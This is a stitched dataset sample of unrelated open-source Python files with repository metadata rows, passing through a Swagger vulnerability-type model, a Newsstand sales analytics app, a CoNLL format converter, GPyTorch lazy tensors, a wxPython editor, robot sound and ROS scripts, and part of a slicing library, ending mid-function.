"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'cvss_score': 'float',
'severity': 'VulnerabilityTypeSeverity',
'details': 'list[VulnerabilityTypeDetail]'
}
attribute_map = {
'cvss_score': 'cvss_score',
'severity': 'severity',
'details': 'details'
}
def __init__(self, cvss_score=None, severity=None, details=None): # noqa: E501
"""ApiVulnerabilityType - a model defined in Swagger""" # noqa: E501
self._cvss_score = None
self._severity = None
self._details = None
self.discriminator = None
if cvss_score is not None:
self.cvss_score = cvss_score
if severity is not None:
self.severity = severity
if details is not None:
self.details = details
@property
def cvss_score(self):
"""Gets the cvss_score of this ApiVulnerabilityType. # noqa: E501
The CVSS score for this Vulnerability. # noqa: E501
:return: The cvss_score of this ApiVulnerabilityType. # noqa: E501
:rtype: float
"""
return self._cvss_score
@cvss_score.setter
def cvss_score(self, cvss_score):
"""Sets the cvss_score of this ApiVulnerabilityType.
The CVSS score for this Vulnerability. # noqa: E501
:param cvss_score: The cvss_score of this ApiVulnerabilityType. # noqa: E501
:type: float
"""
self._cvss_score = cvss_score
@property
def severity(self):
"""Gets the severity of this ApiVulnerabilityType. # noqa: E501
:return: The severity of this ApiVulnerabilityType. # noqa: E501
:rtype: VulnerabilityTypeSeverity
"""
return self._severity
@severity.setter
def severity(self, severity):
"""Sets the severity of this ApiVulnerabilityType.
:param severity: The severity of this ApiVulnerabilityType. # noqa: E501
:type: VulnerabilityTypeSeverity
"""
self._severity = severity
@property
def details(self):
"""Gets the details of this ApiVulnerabilityType. # noqa: E501
All information about the package to specifically identify this vulnerability. One entry per (version range and cpe_uri) the package vulnerability has manifested in. # noqa: E501
:return: The details of this ApiVulnerabilityType. # noqa: E501
:rtype: list[VulnerabilityTypeDetail]
"""
return self._details
@details.setter
def details(self, details):
"""Sets the details of this ApiVulnerabilityType.
All information about the package to specifically identify this vulnerability. One entry per (version range and cpe_uri) the package vulnerability has manifested in. # noqa: E501
:param details: The details of this ApiVulnerabilityType. # noqa: E501
:type: list[VulnerabilityTypeDetail]
"""
self._details = details
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApiVulnerabilityType, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiVulnerabilityType):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| apache-2.0 | -6,049,898,657,363,391,000 | 29.766082 | 187 | 0.592663 | false |
araseyuta/Newsstand-analytics | app/views.py | 1 | 13173 | import os
import re
import csv
from django.shortcuts import render_to_response
from django.http import HttpResponseRedirect
from django.http import HttpResponse
from google.appengine.ext import db
from google.appengine.ext.db import djangoforms
from google.appengine.api import urlfetch
from google.appengine.api import users
from google.appengine.api import mail
from app import models
from google.appengine.ext import webapp, db
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
import datetime
import random
def index(request):
user();
return render_to_response('app/index.html',{'a':random.randint(1,10),},)
#####################################################################
#### ####
#### Function:For Register Login User & Login Time
#### Using Each Function
####
#### Purpose:
#### Save User & DateTime into datastore
####
#### ####
#####################################################################
def user():
user = users.get_current_user()
query = db.Query(models.User).filter('user_id =', user.user_id())
e = query.get()
#Aleady this AppleID of SKU exists => Check the Price only...
if e:
time = datetime.datetime.now()
time += datetime.timedelta(0,0,0,0,0,9)
e.datetime = time
else:
e = models.User()
e.email = user.email()
e.user_id = user.user_id()
e.nickname = user.nickname()
time = datetime.datetime.now()
time += datetime.timedelta(0,0,0,0,0,9)
e.datetime = time
user_address = "Admin<[email protected]>"
sender_address = "Admin<[email protected]>"
subject = "[Newsstand Analytics Test]%s started using! "% user.email()
body = """
%s has started using of [Newsstand Analytics Test]
"""% user.email()
mail.send_mail(sender_address, user_address, subject, body)
e.put()
#####################################################################
#### ####
#### Function:For Calclation Total Sale Each Apps
#### URL: /totalsale/
####
#### Purpose:
#### GET:Show the Form in order to Upload TSV file(AppleReport)
####
#### POST:
#### 1:Load TSV File & Load SKU list from Datastore
#### 2:Calclate each SKU and each subscriptin units in the target file
#### 3:multiple each SKU Units and SKU cost (to estimate total sales each SKU)
#### 4:Summing each SKU sales to parent SKU
####
#### ####
#####################################################################
def totalsales(request):
if request.method == 'GET':
user();
return render_to_response('app/totalsales.html',{'a':random.randint(1,10),},)
elif request.method == 'POST':
NS = {};
SKUlist = [];
ParentSKU={};
SKU2PriceDict={};
SKU2ParentDict={};
query = models.SKU.all().order('SKU')
#Make list of SKU
for e in query:
if e.SKU == 'SKU':
continue;
#if SKU is ns_ . . . => Add to ParentSKUlist
if e.SKU[0:3] == "ns_":
ParentSKU[e.SKU] = 0;
#if SKU is not ns_ . . . => Add to SKUlist
else:
SKUlist.append(e.SKU);
SKU2PriceDict[e.SKU] = e.price;
SKU2ParentDict[e.SKU] =e.ParentIdentifier;
#Make Dictionary of SKU
for SKU in SKUlist:
NS[SKU] = 0;
#check selecting file
while True:
try:
r = request.FILES['file']
break;
except:
return render_to_response('app/totalsales.html',{'try':'Prease select your AppleReport. . .',},)
# except Exception as e:
# return render_to_response('app/totalsales.html',{'try':'Prease select your AppleReport. . .','e':e},)
#Load TSV file (OF APPLE REPORT)
r = request.FILES['file'];
lines = r.readlines();
count = 0;
#Load Each Record. . .
for line in lines:
count = count +1;
AppleReport = line[:-1].split('\t');
if len(AppleReport)<18:
continue;
SKU = AppleReport[2];
Unit = AppleReport[7];
#if SKU colm means AppDownloadCount -> Add the Units. . .
for SKUMatch in SKUlist:
if SKU == SKUMatch:
NS[SKU] = NS[SKU] + int(Unit);
#After Adding All Recoad of Units --> Calc The Price of Each SKU
for SKU in SKUlist:
NS[SKU] = NS[SKU] * SKU2PriceDict[SKU];
#Calc the Each Apps --> Calc The Price of Each SKU
for SKU in SKUlist:
ParentSKU[SKU2ParentDict[SKU]]= ParentSKU[SKU2ParentDict[SKU]] + NS[SKU];
return render_to_response('app/totalsales.html',
{
'POST':True,
'r':r.name,
'NS':ParentSKU.items(),
},)
#####################################################################
#### ####
#### Function:For Calclation of App Download count
#### URL: /app/
####
#### Purpose:
#### GET:Show the Form in order to Upload TSV file(AppleReport)
####
#### POST:
#### 1:Load TSV File & Load SKU list from Datastore
#### 2:Checking the Each Record of AppleReport
#### >if SKU( such as ns_application_name) is listed :: Add the Units
####
#### ####
#####################################################################
def app(request):
if request.method == 'GET':
user();
return render_to_response('app/app.html',{'a':random.randint(1,10),},)
elif request.method == 'POST':
NS = {};
SKUlist=[];
query = models.SKU.all().order('SKU')
#Make list of SKU
for e in query:
if e.SKU[0:3] == "ns_":
SKUlist.append(e.SKU);
#Make Dictionary of SKU
for SKU in SKUlist:
NS[SKU] = 0;
#check selecting file
while True:
try:
r = request.FILES['file']
break;
except:
return render_to_response('app/app.html',{'try':'Prease select your AppleReport. . .',},)
# except Exception as e:
# return render_to_response('app/app.html',{'try':'Prease select your AppleReport. . .','e':e},)
#Load TSV file (OF APPLE REPORT)
r = request.FILES['file'];
lines = r.readlines();
count = 0;
#Load Each Record. . .
for line in lines:
count = count +1;
AppleReport = line[:-1].split('\t');
if len(AppleReport)<18:
continue;
SKU = AppleReport[2];
Unit = AppleReport[7];
#if SKU colm means AppDownloadCount -> Add the Units. . .
if SKU[0:3] == "ns_":
for SKUMatch in SKUlist:
if SKU == SKUMatch:
if AppleReport[6] == "1F":
NS[SKU] = NS[SKU] + int(Unit);
return render_to_response('app/app.html',
{
'POST':True,
'r':r.name,
'NS':NS.items(),
},)
#####################################################################
#### ####
#### Function:For Calclation of Weekly Report
#### URL: /sales/
####
#### Purpose:
#### GET:Show the Form in order to Upload TSV file(AppleReport)
####
#### POST:
#### 1:Load TSV File & Load SKU list from Datastore
#### 2:Checking the Each Record of AppleReport
#### >if SKU is listed :: Add the Units
#### 3:After adding Units all of records, Calc the Price
#### ####
#####################################################################
def sales(request):
if request.method == 'GET':
user();
return render_to_response('app/sales.html',{'a':random.randint(1,10),},)
elif request.method == 'POST':
POST = True;
NS = {};
SKUlist=[];
SKU2PriceDict = {};
query = models.SKU.all().order('SKU')
#Make list of SKU
for e in query:
if e.SKU == "SKU":
continue;
if e.SKU[0:3] == "ns_":
continue;
SKUlist.append(e.SKU);
SKU2PriceDict[e.SKU] = e.price;
#Make Dictionary of SKU
for SKU in SKUlist:
NS[SKU] = {'SKU':SKU,
'New':{'price':0,'units':0},
'Renewal':{'price':0,'units':0}
}
#check selecting file
while True:
try:
r = request.FILES['file']
break;
except:
return render_to_response('app/sales.html',{'try':'Prease select your AppleReport. . .',},)
# except Exception as e:
# return render_to_response('app/sales.html',{'try':'Prease select your AppleReport. . .','e':e},)
#Load TSV file (OF APPLE REPORT)
r = request.FILES['file'];
lines = r.readlines();
count = 0;
#Load Each Record. . .
for line in lines:
count = count +1;
AppleReport = line[:-1].split('\t');
SKU = AppleReport[2];
Unit = AppleReport[7];
Subscription = AppleReport[18];
#if Subscription colm is NULL -> Skip. . .
if Subscription == 'New':
Subscription = Subscription
elif Subscription == 'Renewal':
Subscription = Subscription
else:
continue
#if SKU colm means Header -> Skip. . .
if SKU == "SKU":
continue;
#if SKU colm means AppDownloadCount -> Skip. . .
if SKU[0:3] == "ns_":
continue;
#Check, is SKU in a list? -> IF exists, Add the Units
for SKUMatch in SKUlist:
if SKU == SKUMatch:
NS[SKU][Subscription]['units'] = NS[SKU][Subscription]['units'] + int(Unit);
#After Adding All Recoad of Units --> Calculate the Price. . .
for SKU in SKUlist:
NS[SKU]['New']['price'] = NS[SKU]['New']['units'] * SKU2PriceDict[SKU];
NS[SKU]['Renewal']['price'] = NS[SKU]['Renewal']['units'] * SKU2PriceDict[SKU];
return render_to_response('app/sales.html',
{
'POST':POST,
'r':r.name,
'NS':NS.items(),
},)
#####################################################################
#### ####
#### Function:For Register New SKU
#### URL: /register/
####
#### Purpose:
#### GET:Show the Form in prder to Upload CSV file
####
#### POST:
#### 1:Load CSV File
#### 2:Search AppleID of SKU In Datastore
#### >if New :: Add to the datastore
#### >if Already exists :: Check price only
#### ####
#####################################################################
def register(request):
if request.method == 'GET':
user();
return render_to_response('app/register.html',{'a':random.randint(1,10),},)
elif request.method == 'POST':
POST = True;
SKUlist = [];
NewSKUlist = [];
#check selecting file
while True:
try:
r = request.FILES['file']
break;
except:
return render_to_response('app/register.html',{'try':'Prease select your AppleReport. . .',},)
# except Exception as e:
# return render_to_response('app/register.html',{'try':'Prease select your AppleReport. . .','e':e},)
#OpenFile
r = request.FILES['file'];
lines = r.readlines();
#Check Return code
if len(lines)==1:
lines = lines[0].split(chr(13));
if len(lines)==1:
lines = lines[0].split(chr(10));
value = 1;#for Debug
#Read each line => and Check AppleID in datastore
for line in lines:
AppleReport = line.split(',');
if len(AppleReport)<18:
continue;
if AppleReport[14] == 'Apple Identifier':
continue;
query = db.Query(models.SKU).filter('AppleID =', int(AppleReport[14]))
e = query.get()
#Aleady this AppleID of SKU exists => Check the Price only...
if e:
e.price = int(AppleReport[15])
value = value + 1;
#Fine New AppleID of SKU => Save to Datastore
else:
e = models.SKU()
e.SKU = AppleReport[2]
e.price = int(AppleReport[15])
e.ParentIdentifier = AppleReport[17]
e.AppleID = int(AppleReport[14])
NewSKUlist.append(e);
value = value + 1;
#Both OLD and NEW, Put to the Datastore and Push to the SKULIST...
e.put()
SKUlist.append(e)
return render_to_response('app/register.html',{
'POST':POST,
'r':r.name,
'NewSKUlist':NewSKUlist,
'SKUlist':SKUlist,
},)
| apache-2.0 | -2,135,317,619,511,722,800 | 29.282759 | 110 | 0.48774 | false |
TurkuNLP/Finnish-dep-parser | conv_u_09.py | 1 | 1760 | import sys
import argparse
ID,FORM,LEMMA,UCPOS,UPOS,UFEAT,UHEAD,UDEPREL,UDEPS,UMISC=range(10)
ID,FORM,LEMMA,PLEMMA,POS,PPOS,FEAT,PFEAT,HEAD,PHEAD,DEPREL,PDEPREL=range(12)
if __name__=="__main__":
parser = argparse.ArgumentParser(description='Convert conllu to conll09 and back. Infers the direction on its own if no arguments given.')
parser.add_argument('--output-format', default=None, help='Output format can be "u" or "09". If the input is in this format already, the conversion is a no-op and simply passes data through.')
parser.add_argument('--drop-comments', default=False, action="store_true", help='Remove comments from the data')
args = parser.parse_args()
for line in sys.stdin:
line=line.strip()
if not line:
print
elif line.startswith('#'):
if not args.drop_comments:
print line
else:
cols=line.split('\t')
if len(cols)==10:
#UD in
if args.output_format=="u":
#UD out, no-op
print '\t'.join(cols)
else:
#UD -> 09
print '\t'.join((cols[ID],cols[FORM],cols[LEMMA],cols[LEMMA],cols[UCPOS],cols[UCPOS],cols[UFEAT],cols[UFEAT],cols[UHEAD],cols[UHEAD],cols[UDEPREL],cols[UDEPREL],'_','_'))
else:
#09 in
assert len(cols) in (12,13,14), cols
if args.output_format=="09":
#09 out, no-op
print '\t'.join(cols)
else:
#09 -> UD
print '\t'.join((cols[ID],cols[FORM],cols[PLEMMA],cols[PPOS],'_',cols[PFEAT],cols[PHEAD],cols[PDEPREL],'_','_'))
| gpl-2.0 | -676,060,049,442,735,100 | 43 | 196 | 0.543182 | false |
jrg365/gpytorch | gpytorch/lazy/mul_lazy_tensor.py | 1 | 6031 | #!/usr/bin/env python3
import torch
from ..utils.broadcasting import _matmul_broadcast_shape
from ..utils.memoize import cached
from .lazy_tensor import LazyTensor
from .root_lazy_tensor import RootLazyTensor
class MulLazyTensor(LazyTensor):
def _check_args(self, left_lazy_tensor, right_lazy_tensor):
if not isinstance(left_lazy_tensor, LazyTensor) or not isinstance(right_lazy_tensor, LazyTensor):
return "MulLazyTensor expects two LazyTensors."
if left_lazy_tensor.shape != right_lazy_tensor.shape:
return "MulLazyTensor expects two LazyTensors of the same size: got {} and {}.".format(
left_lazy_tensor, right_lazy_tensor
)
def __init__(self, left_lazy_tensor, right_lazy_tensor):
"""
Args:
- lazy_tensors (A list of LazyTensor) - A list of LazyTensor to multiplicate with.
"""
if not isinstance(left_lazy_tensor, RootLazyTensor):
left_lazy_tensor = left_lazy_tensor.root_decomposition()
if not isinstance(right_lazy_tensor, RootLazyTensor):
right_lazy_tensor = right_lazy_tensor.root_decomposition()
super(MulLazyTensor, self).__init__(left_lazy_tensor, right_lazy_tensor)
self.left_lazy_tensor = left_lazy_tensor
self.right_lazy_tensor = right_lazy_tensor
def _get_indices(self, row_index, col_index, *batch_indices):
left_res = self.left_lazy_tensor._get_indices(row_index, col_index, *batch_indices)
right_res = self.right_lazy_tensor._get_indices(row_index, col_index, *batch_indices)
return left_res * right_res
def _matmul(self, rhs):
output_shape = _matmul_broadcast_shape(self.shape, rhs.shape)
output_batch_shape = output_shape[:-2]
is_vector = False
if rhs.ndimension() == 1:
rhs = rhs.unsqueeze(1)
is_vector = True
# Here we have a root decomposition
if isinstance(self.left_lazy_tensor, RootLazyTensor):
left_root = self.left_lazy_tensor.root.evaluate()
left_res = rhs.unsqueeze(-2) * left_root.unsqueeze(-1)
rank = left_root.size(-1)
n = self.size(-1)
m = rhs.size(-1)
# Now implement the formula (A . B) v = diag(A D_v B)
left_res = left_res.view(*output_batch_shape, n, rank * m)
left_res = self.right_lazy_tensor._matmul(left_res)
left_res = left_res.view(*output_batch_shape, n, rank, m)
res = left_res.mul_(left_root.unsqueeze(-1)).sum(-2)
# This is the case where we're not doing a root decomposition, because the matrix is too small
else:
res = (self.left_lazy_tensor.evaluate() * self.right_lazy_tensor.evaluate()).matmul(rhs)
res = res.squeeze(-1) if is_vector else res
return res
def _mul_constant(self, other):
return self.__class__(self.left_lazy_tensor._mul_constant(other), self.right_lazy_tensor)
def _quad_form_derivative(self, left_vecs, right_vecs):
if left_vecs.ndimension() == 1:
left_vecs = left_vecs.unsqueeze(1)
right_vecs = right_vecs.unsqueeze(1)
*batch_shape, n, num_vecs = left_vecs.size()
if isinstance(self.right_lazy_tensor, RootLazyTensor):
right_root = self.right_lazy_tensor.root.evaluate()
left_factor = left_vecs.unsqueeze(-2) * right_root.unsqueeze(-1)
right_factor = right_vecs.unsqueeze(-2) * right_root.unsqueeze(-1)
right_rank = right_root.size(-1)
else:
right_rank = n
eye = torch.eye(n, dtype=self.right_lazy_tensor.dtype, device=self.right_lazy_tensor.device)
left_factor = left_vecs.unsqueeze(-2) * self.right_lazy_tensor.evaluate().unsqueeze(-1)
right_factor = right_vecs.unsqueeze(-2) * eye.unsqueeze(-1)
left_factor = left_factor.view(*batch_shape, n, num_vecs * right_rank)
right_factor = right_factor.view(*batch_shape, n, num_vecs * right_rank)
left_deriv_args = self.left_lazy_tensor._quad_form_derivative(left_factor, right_factor)
if isinstance(self.left_lazy_tensor, RootLazyTensor):
left_root = self.left_lazy_tensor.root.evaluate()
left_factor = left_vecs.unsqueeze(-2) * left_root.unsqueeze(-1)
right_factor = right_vecs.unsqueeze(-2) * left_root.unsqueeze(-1)
left_rank = left_root.size(-1)
else:
left_rank = n
eye = torch.eye(n, dtype=self.left_lazy_tensor.dtype, device=self.left_lazy_tensor.device)
left_factor = left_vecs.unsqueeze(-2) * self.left_lazy_tensor.evaluate().unsqueeze(-1)
right_factor = right_vecs.unsqueeze(-2) * eye.unsqueeze(-1)
left_factor = left_factor.view(*batch_shape, n, num_vecs * left_rank)
right_factor = right_factor.view(*batch_shape, n, num_vecs * left_rank)
right_deriv_args = self.right_lazy_tensor._quad_form_derivative(left_factor, right_factor)
return tuple(list(left_deriv_args) + list(right_deriv_args))
def _expand_batch(self, batch_shape):
return self.__class__(
self.left_lazy_tensor._expand_batch(batch_shape), self.right_lazy_tensor._expand_batch(batch_shape)
)
def diag(self):
res = self.left_lazy_tensor.diag() * self.right_lazy_tensor.diag()
return res
@cached
def evaluate(self):
return self.left_lazy_tensor.evaluate() * self.right_lazy_tensor.evaluate()
def _size(self):
return self.left_lazy_tensor.size()
def _transpose_nonbatch(self):
# mul.lazy_tensor only works with symmetric matrices
return self
def representation(self):
"""
Returns the Tensors that are used to define the LazyTensor
"""
res = super(MulLazyTensor, self).representation()
return res
def representation_tree(self):
return super(MulLazyTensor, self).representation_tree()
| mit | -299,347,341,140,442,200 | 43.345588 | 111 | 0.628917 | false |
GitExl/WhackEd4 | src/whacked4/ui/editors/miscframe.py | 1 | 7083 | #!/usr/bin/env python
#coding=utf8
from whacked4 import utils
from whacked4.ui import editormixin, windows
import copy
import wx
class MiscFrame(editormixin.EditorMixin, windows.MiscFrameBase):
"""
Misc editor window.
"""
def __init__(self, parent):
windows.MiscFrameBase.__init__(self, parent)
editormixin.EditorMixin.__init__(self)
self.SetIcon(wx.Icon('res/editor-misc.ico'))
self.patch = None
self.selected_index = -1
self.data_type = None
def build(self, patch):
"""
@see: EditorMixin.build
"""
self.patch = patch
self.misclist_build()
def update(self):
"""
@see: EditorMixin.update
"""
pass
def misc_select(self, event):
"""
Selects a new ammo entry.
"""
self.selected_index = event.GetIndex()
self.update_properties()
def update_properties(self):
"""
Updates the displayed properties of the currently selected entry.
"""
if not self.patch:
return
misc_data_keys = list(self.patch.engine.misc_data.keys())
key = misc_data_keys[self.selected_index]
data = self.patch.engine.misc_data[key]
value = self.patch.misc[key]
self.Value.Disable()
self.Value.ChangeValue('')
self.ValueEnabled.Disable()
self.ValueEnabled.SetValue(False)
self.data_type = data['type']
if data['type'] == 'boolean':
self.ValueEnabled.Enable()
if value == data['on']:
self.ValueEnabled.SetValue(True)
else:
self.ValueEnabled.SetValue(False)
else:
self.Value.Enable()
self.Value.ChangeValue(str(value))
def misclist_build(self):
"""
Builds the misc. data list.
"""
self.MiscList.ClearAll()
# Add column headers if necessary.
if self.MiscList.GetColumnCount() == 0:
self.MiscList.InsertColumn(0, 'Name', width=76)
self.MiscList.InsertColumn(1, 'Value', width=67)
misc_values = list(self.patch.engine.misc_data.values())
for misc_index in range(len(misc_values)):
misc_value = misc_values[misc_index]
self.MiscList.InsertItem(misc_index, misc_value['name'])
self.misclist_update_row(misc_index)
self.list_autosize(self.MiscList)
self.MiscList.Select(0, True)
def misclist_update_row(self, row_index):
"""
Updates a row in the misc list.
"""
data_keys = list(self.patch.engine.misc_data.keys())
data_key = data_keys[row_index]
data = self.patch.engine.misc_data[data_key]
value = self.patch.misc[data_key]
self.MiscList.SetItem(row_index, 0, data['name'])
if data['type'] == 'boolean':
if value == data['on']:
str_value = 'On'
else:
str_value = 'Off'
else:
str_value = str(value)
self.MiscList.SetItem(row_index, 1, str_value)
def misclist_resize(self, event):
"""
Resize the misc name column as wide as possible.
"""
if not self.MiscList.GetColumnCount():
return
column_width = self.MiscList.GetClientSize()[0] - 4
self.MiscList.SetColumnWidth(0, 200)
self.MiscList.SetColumnWidth(1, column_width - 200)
def set_value(self, event):
"""
Validates and sets a misc. property.
"""
self.undo_add()
window_id = event.GetId()
window = self.FindWindowById(window_id)
if self.data_type == 'int' or self.data_type == 'byte':
value = utils.validate_numeric(window)
elif self.data_type == 'float':
value = utils.validate_numeric_float(window)
else:
value = window.GetValue()
key_list = list(self.patch.engine.misc_data.keys())
key = key_list[self.selected_index]
# Clamp values to their data type range.
if self.data_type == 'int':
if value < -0x80000000:
value = -0x80000000
elif value > 0x80000000:
value = 0x80000000
window.ChangeValue(str(value))
elif self.data_type == 'byte':
if value < 0:
value = 0
elif value > 255:
value = 255
window.ChangeValue(str(value))
self.patch.misc[key] = value
self.is_modified(True)
self.misclist_update_row(self.selected_index)
def set_bool_value(self, event):
"""
Validates and sets a misc. boolean property.
"""
self.undo_add()
key_list = list(self.patch.engine.misc_data.keys())
key = key_list[self.selected_index]
data = self.patch.engine.misc_data[key]
if self.ValueEnabled.GetValue():
self.patch.misc[key] = data['on']
else:
self.patch.misc[key] = data['off']
self.is_modified(True)
self.misclist_update_row(self.selected_index)
def misc_action(self, event):
"""
Performs the default action for a misc. item.
"""
key_list = list(self.patch.engine.misc_data.keys())
key = key_list[self.selected_index]
data = self.patch.engine.misc_data[key]
# Booleans are toggled.
if data['type'] == 'boolean':
self.undo_add()
value = self.patch.misc[key]
if value == data['on']:
self.patch.misc[key] = data['off']
elif value == data['off']:
self.patch.misc[key] = data['on']
self.is_modified(True)
self.update_properties()
self.misclist_update_row(self.selected_index)
# Other values shift focus to the value to edit.
else:
self.Value.SetFocus()
self.Value.SetSelection(-1, -1)
def restore(self, event):
"""
Restore the selected misc item to it's engine state.
"""
self.undo_add()
key_list = list(self.patch.engine.misc_data.keys())
key = key_list[self.selected_index]
self.patch.misc[key] = copy.copy(self.patch.engine.misc[key])
self.misclist_update_row(self.selected_index)
self.update_properties()
def undo_restore_item(self, item):
"""
@see: EditorMixin.undo_restore_item
"""
self.patch.misc[item['key']] = item['item']
self.misclist_update_row(item['index'])
self.update_properties()
self.is_modified(True)
def undo_store_item(self):
"""
@see: EditorMixin.undo_store_item
"""
key_list = list(self.patch.engine.misc_data.keys())
key = key_list[self.selected_index]
return {
'item': self.patch.misc[key],
'index': self.selected_index,
'key': key
}
| bsd-2-clause | 5,606,244,057,570,175,000 | 26.034351 | 73 | 0.550755 | false |
Skaper/RMCStudio | scrips_robot/old/progSound.py | 1 | 1658 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pygame import mixer
import threading, random, socket
play = 0
file = 0
sock = socket.socket()
sock.bind(('', 6000))
sock.listen(1)
conn, addr = sock.accept()
#sock.settimeout(.01)
def soundPlayer(arg3, soundPlayer_stop):
global file
global play
while 1:
if play == 1:
mixer.init(16000, -16, 1, 2048)
mixer.music.load("/home/pi/r2d2/sound/"+str(file)+".MP3")
print file
mixer.music.play()
while mixer.music.get_busy() == True:
if play==0:
mixer.music.stop()
continue
file = random.randint(0, 10) #Random sound
#play = 0
soundPlayer_stop = threading.Event()
#soundPlayer=threading.Thread(target=soundPlayer)
soundPlayer=threading.Thread(target=soundPlayer, args=(2, soundPlayer_stop))
soundPlayer.start()
def simplePlay(file):
mixer.init(16000, -16, 1, 2048)
mixer.music.load("/home/pi/r2d2/sound/"+file+".MP3")
mixer.music.play()
while mixer.music.get_busy() == True:
continue
#simplePlay("ready")
print "> OK. Start!"
print '> Connected:', addr
def reStart():
global conn, addr
conn.close()
conn, addr = sock.accept()
while True:
#data = conn.recv(16384)
data = raw_input()
if not data:
print '> RESTART'
reStart()
if data == 'PLAYsound' and play == 0:
print "> Play sound"
file = str(random.randint(0, 10))
play=1 #On playing
if data == 'STOPsound':
print "> Stop sound"
play = 0
conn.close() | apache-2.0 | -6,256,733,322,677,014,000 | 21.726027 | 76 | 0.571773 | false |
anthony-jclark/adabot | adabot_localization/scripts/velocity_smoother.py | 1 | 1405 | #!/usr/bin/env python
"""
This node is responsible for turning smoothing the velocity
odometry data using a moving average.
"""
from collections import deque
import rospy
from std_msgs.msg import Float64
from nav_msgs.msg import Odometry
MAX_LEN = 10
vxs = deque(maxlen=MAX_LEN)
vxs.append(0)
total = 0
def odometry_callback(data):
global total
# Get the oldest speed value (if it exists)
old_val = vxs.popleft() if len(vxs) == MAX_LEN else 0
# Get the new speed value from the given data
new_val = data.twist.twist.linear.x
# Replace the oldest value with the new value
total = total - old_val + new_val
vxs.append(new_val)
def publish_smoothed_velocity():
rate = rospy.Rate(30)
smooth_publisher = rospy.Publisher('adabot/smooth_velocity', Float64, queue_size=1)
while not rospy.is_shutdown():
# AJC: this should probably be a stamped message
data = Float64()
data.data = total / len(vxs)
smooth_publisher.publish(data)
rate.sleep()
if __name__ == '__main__':
# Initialize this node
rospy.init_node('adabot_velocity_smoother')
# Listen to the joint states published by ros_control
rospy.Subscriber('adabot/filtered/odometry', Odometry, odometry_callback)
# Go into the publish loop
try:
publish_smoothed_velocity()
except rospy.ROSInterruptException:
pass
| mit | -1,786,540,024,791,006,700 | 22.032787 | 87 | 0.676868 | false |
interpretml/slicer | slicer/slicer_internal.py | 1 | 20627 | """ Lower level layer for slicer.
Mom's spaghetti.
"""
# TODO: Consider boolean array indexing.
from typing import Any, AnyStr, Union, List, Tuple
from abc import abstractmethod
import numbers
class AtomicSlicer:
""" Wrapping object that will unify slicing across data structures.
What we support:
Basic indexing (return references):
- (start:stop:step) slicing
- support ellipses
Advanced indexing (return references):
- integer array indexing
Numpy Reference:
Basic indexing (return views):
- (start:stop:step) slicing
- support ellipses and newaxis (alias for None)
Advanced indexing (return copy):
- integer array indexing, i.e. X[[1,2], [3,4]]
- boolean array indexing
- mixed array indexing (has integer array, ellipses, newaxis in same slice)
"""
def __init__(self, o: Any, max_dim: Union[None, int, AnyStr] = "auto"):
""" Provides a consistent slicing API to the object provided.
Args:
o: Object to enable consistent slicing.
Currently supports numpy dense arrays, recursive lists ending with list or numpy.
max_dim: Max number of dimensions the wrapped object has.
If set to "auto", max dimensions will be inferred. This comes at compute cost.
"""
self.o = o
self.max_dim = max_dim
if self.max_dim == "auto":
self.max_dim = UnifiedDataHandler.max_dim(o)
def __repr__(self) -> AnyStr:
""" Override default repr for human readability.
Returns:
String to display.
"""
return f"{self.__class__.__name__}({self.o.__repr__()})"
def __getitem__(self, item: Any) -> Any:
""" Consistent slicing into wrapped object.
Args:
item: Slicing key of type integer or slice.
Returns:
Sliced object.
Raises:
ValueError: If slicing is not compatible with wrapped object.
"""
# Turn item into tuple if not already.
index_tup = unify_slice(item, self.max_dim)
# Slice according to object type.
return UnifiedDataHandler.slice(self.o, index_tup, self.max_dim)
def unify_slice(item: Any, max_dim: int, alias_lookup=None) -> Tuple:
""" Resolves aliases and ellipses in a slice item.
Args:
item: Slicing key that is passed to __getitem__.
max_dim: Max dimension of object to be sliced.
alias_lookup: AliasLookup structure.
Returns:
A tuple representation of the item.
"""
item = _normalize_slice_key(item)
index_tup = _normalize_subkey_types(item)
index_tup = _handle_newaxis_ellipses(index_tup, max_dim)
if alias_lookup:
index_tup = _handle_aliases(index_tup, alias_lookup)
return index_tup
def _normalize_subkey_types(index_tup: Tuple) -> Tuple:
""" Casts subkeys into basic types such as int.
Args:
key: Slicing key that is passed within __getitem__.
Returns:
Tuple with subkeys casted to basic types.
"""
new_index_tup = [] # Gets casted to tuple at the end
np_int_types = {
"int8",
"int16",
"int32",
"int64",
"uint8",
"uint16",
"uint32",
"uint64",
}
for subkey in index_tup:
if _safe_isinstance(subkey, "numpy", np_int_types):
new_subkey = int(subkey)
elif _safe_isinstance(subkey, "numpy", "ndarray"):
if len(subkey.shape) == 1:
new_subkey = subkey.tolist()
else:
raise ValueError(f"Cannot use array of shape {subkey.shape} as subkey.")
else:
new_subkey = subkey
new_index_tup.append(new_subkey)
return tuple(new_index_tup)
def _normalize_slice_key(key: Any) -> Tuple:
""" Normalizes slice key into always being a top-level tuple.
Args:
key: Slicing key that is passed within __getitem__.
Returns:
Expanded slice as a tuple.
"""
if not isinstance(key, tuple):
return (key,)
else:
return key
def _handle_newaxis_ellipses(index_tup: Tuple, max_dim: int) -> Tuple:
""" Expands newaxis and ellipses within a slice for simplification.
This code is mostly adapted from: https://github.com/clbarnes/h5py_like/blob/master/h5py_like/shape_utils.py#L111
Args:
index_tup: Slicing key as a tuple.
max_dim: Maximum number of dimensions in the respective sliceable object.
Returns:
Expanded slice as a tuple.
"""
non_indexes = (None, Ellipsis)
concrete_indices = sum(idx not in non_indexes for idx in index_tup)
index_list = []
